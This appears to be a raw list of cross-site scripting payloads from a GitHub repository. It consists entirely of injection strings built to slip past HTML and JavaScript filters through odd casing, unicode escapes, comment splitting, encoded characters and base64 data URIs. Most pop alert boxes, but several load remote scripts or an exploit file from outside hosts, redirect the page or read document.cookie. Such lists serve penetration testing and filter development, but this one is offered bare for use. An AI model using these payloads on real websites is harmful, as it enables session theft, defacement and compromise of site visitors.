#############################################################
#  XSS-Payloads   https://github.com/RenwaX23/XSS-Payloads  #
#             https://twitter.com/RenwaX23                  #
#############################################################

renwa<AuDiO/**/oNLoaDStaRt='(_=/**/confirm/**/(1))'/src><!--

<mArquee onStart%3D[~[onmouseleave(([[(alert(1))]]))]] ]

<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z

<a/onmousemove=alert(1)//><h1>A<br>A<br>A<br>A<br>A<br>A<br>A<br>A<br>A<br>A<br>renwa says /XSS/ <!--

renwa\"'/>><svg+onload=eval(location.hash.substr(1))>#\u0077hile(\u0074rue){pr\u006fmp\u0074(1)}

<button onmousemove="javascript:alert(1)">renwa

--><BoDy%0AOnpaGeshoW=%2bwindow.prompt(1)

<a href=[0x0b]renwa" onfocus=prompt(1) autofocus fragment="

<isindex type=image src=1 onerror=alert(1)>

"'/>;</style><script>a=eval;b=alert;a(b(/ 1/.source));</script>'">

';alert(1)//';alert(1)//";alert(1)//";alert(1)//--></sCRipT>">'><sCRipT>alert(1)</sCRipT>

'}};'">});});})]--></SCRIPT>-</style>-</title>-</BoDy>-<marquee>-<h1>XXX</h1>-</marquee>-<svg/onload=alert(1);>;{{';{//

<img src="/" =_=" title="onerror='var/**/w=window.top.document;var/**/x=w.createElement("script");x.type="text/javascript";x.src="https://doom.fredrik-almroth.se/exploit.js";w.getElementsByTagName("head")[0].appendChild(x);window.top.history.pushState("","","/doom.exe");'">

<!%27/!"/!\%27/\"/--!><Input/Type=Text%20AutoFocus%20*/;%20OnFocus=(confirm)(document.cookie)%20//>

" onmouseover="confirm(/OPENBUGBOUNTY/)"style="position:absolute;width:100%;height:100%;top:0;left:0;"

<style><img src="</style><img src=x "><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

--></SCRIPT>">'+><SCRIPT>alert(1)</SCRIPT>=&{}");}alert(6+);function+xss(){//

'*confirm(1)*'+"/>renwa" onfocus=prompt(/OPENBUGBOUNTY/) autofocus fragment="+--><video/poster/onerror=prompt(1)>

<embed src=/x//alert(1)><base href="javascript:\

<img src="/" =_=" title="onerror='/**/prompt(1)'">

test<SPAN " style="display: block; position: absolute; top: 0; left: 0; width: 9999px; height: 9999px; z-index: 9999" foo="></span>

<article xmlns ="urn:img src=x onerror=xss()//" >123

<img style =" font -fa\22on-load\3dxss\28\29\20mily :'arial '" src =" test.jpg" />

i\{\<\/\s\t\y\le\>\<\i\m\g\20\o\ne\r\r\o\r\=\'a\le\r\t\(d\oc\u\me\nt\.c\o\o\kie\)\'\s\rc\=\'eeeeeee\'\20\>{

<img / src = \ 'dfdfd \' // onerror = \ 'alert (document.cookie) \ '>

<img/src=q onerror='new Function`al\ert\`OPENBUGBOUNTY\``'>

'"</Script><Html Onmouseover=(alert)(1) //

<object%20allowscriptaccess=always>%20<param%20name=code%20value=http://renwa.tk/xss.swf>

/x:1/:///%01javascript:alert(document.cookie)/

<script src=http://renwa.tk/d.js></script>

<a href="javascript&colon;alert&lpar;document&period;domain&rpar;">Click Here</a>

javascripT://https://google.com%0aalert(1);//https://google.com

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>

" onfocus="alert(1)" autofocus=""

" onmouseover=alert(1)>Renwa

"><img/src=x+onerror=alert(1)>

%22%3E%3Cimg%2Fsrc%3Dx%2Bonerror%3Dalert(1)%3E%0A

<img ̊ onmouseover="">

'"></script>{{2*2}}${2*2} 

"><script>alert(1)</script>

"}]}';alert(1);{{'

\');confirm(1);//

x");$=alert, $(1);//

"'-alert(1)-'"

\u0027-confirm`1`-\u0027 

<title><!--</title>--!>testtitle</title>

slaw'';!--"><XSS>=&{()}

<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>

%27onmou%3Cseover=1&ale%3Crt(%27xsp%27%3C)%3C%3B1%3B%20//

&#x003c;img src=1 onerror=confirm(1)&#x003e;

%26%23x003c%3Bimg%20src%3D1%20onerror%3Dalert(1)%26%23x003e%3B%0A

x%22%3E%3Cimg%20src=%22x%22%3E%3C!--%2522%2527--%253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/xss/%2529%253E

<embed src=/x//alert(1)><base href="javascript:\

"><x+oncut=y=prompt,y`1`>z

['']"><imG/sRc=l oNerrOr=(prompt)(/XSSPOSED/) x>

-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>

'"--></style></script>"'/>><img+src=x onerror=alert(1)><h1>renwa</h1>

'|alert(1)|'

'*prompt(1)*'

"; ||confirm('XSS') || "

renwa"-alert(1)-"

\'-alert(1)};{//

'"><script/renwa~~~>;alert(1);</script/X~~~>

'"><VideO/**/OnerroR=~alert("1")+/SrC>

renwa)'--><video/poster/onerror=prompt(1)>

renwa" onfocus=prompt(1) autofocus fragment="

""autofocus/onfocus=alert(1)//"

"><sVG/renwa/OnLoaD+="window['confirm']+(1)">

-->"><img x/src=x /onerror="x-\u0063onfirm(1)">

'"><marquee/onstart=alert(1)>renwa

<VidEo/oNLoaDStaRt=confirm(1)+/src>

<video/src=//w3schools.com/tags/movie.mp4%0Aautoplay/onplay=(confirm(document.domain))>

<p/%0Aonmouseover%0A=%0Aconfirm(1)>renwa

<span/onmouseover=confirm(1)>renwa

<iframe/name="javascript:confirm(1);"onload="while(1){eval(name);}">

<svg/onload=window.onerror=alert;throw/XSS/;//

<body/onload=confirm(String.fromCharCode(88,83,83,80,79,83,69,68))>

<object data='data:text/html;base64,PFNDUklQVD5hbGVydCgnWFNTUE9TRUQnKTs8L1NDUklQVD4=' /src>

<InpuT/**/onfocus=pr\u006fmpt(1)%0Aautofocus>renwa

<img src="x:alert" onerror="eval(src%2b'(1)')">

<img/src=renwa%0A/**/onerror=eval('al'%2b'ert(1)')>

<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>

<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>

<img/alt=1 onerror=eval(src) src=x:alert(alt) >

<isindex/**/alt=1+src=renwa:window['alert']/**/(alt)+type=image+onerror=while(true){eval(src)}>

<scr<script>ipt>alert('XSS');</scr</script>ipt>

<input type="text" name="foo" value=""autofocus/onfocus=alert(1)//">

<math href="javascript:alert(1)">CLICKME

"'><body/onload=alert(1)//'">

" autofocus onfocus=alert(1) "

'}};alert(1);{{'

<script>alert(navigator.userAgent)</script>

<var onmouseover="prompt(1)">renwa</var>-KURD

"><h1/onmouseover='alert(1)'>renwa

<object data="javascript:alert(1)">

"><--'<script>window.confirm(1)</script> --!>

renwa"><iframe/onload=alert(1)>"><img src=x onerror=prompt(1);>

<script>'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074('\u0031')</script>

<div onmouseover=prompt("1")>renwa

"><img src=x onerror=window.open('data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTUE9TRUQnKTwvc2NyaXB0Pg==');>

<plaintext/onmousemove=prompt(1)>renwa

<marquee/onstart=alert(1)>renwa

<embed src=javascript:alert(1)>

'"()&%<xps><ScRiPt >prompt(1)</ScRiPt>

<select autofocus onfocus=alert(1)>

<textarea autofocus onfocus=alert(1)>

<keygen autofocus onfocus=alert(1)>

<div/onmouseover='alert(1)'>renwa

>\" onfocus=alert(String.fromCharCode(88,83,83,80,79,83,69,68)) autofocus>

"><svg/onload=document.location.href='https://www.xssposed.org'>

"><audio src=x onerror=confirm("1")>

<iframe src="data:text/html;base64,PFNDUklQVD5hbGVydCgnWFNTUE9TRUQnKTs8L1NDUklQVD4="/>

11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'1

<img%09onerror=alert(1) src=a>

<i onclick=alert(1)>Click here</i>

<title onpropertychange=javascript:alert('XSS')></title><title title=>

<img src=<b onerror=alert('XSS');>

<img src="x:? title=" onerror=alert(1)//">

<img src="x:gif" onerror="eval('al'%2b'ert(0)')">

<img src="x:gif" onerror="window['al\u0065rt'] (/'XSS'/)"></img> 

data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

data:text/html,<svg/onload=alert(1)> 

javascript:"<script>alert(document.domain)</script>"

" onclick=alert(1)//">click</a> 

renwa"><a onmouseover%3D"alert(1)">renwa

<script/%00%00v%00%00>alert(/renwa/)</script>

<b "<script>alert(1)</script>">hola</b> 

'"--><*2f*style><*2f*scRipt><scRipt>alert(1)<*2f*scRipt>

<%tag style=”xss:expression(alert(123))”>

</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> 

renwa"><svg/onload=document.location.href='data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4='>

@renwa<script>$=1,alert($)< /script>-renwa/

\x22\x3E\x3C\x2Fscript\x 3E\x3Cscript src\x3Dhttps\x3A\x2F\x2Fxssposed.org\x2F1.js\x3E

<svg•onload=alert(1)>

"])},alert(1));(function xss() {//

""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y

"><h1/onmouseover='alert(1)'>Renwa

<video onerror=alert(1337) </poster>

<input onfocus=alert(1337) </autofocus>

<script>x='con';s='firm';S='(1)';setTimeout(x+s+S,0);</script>

<script </src="data:,1> (alert)(1337) "">

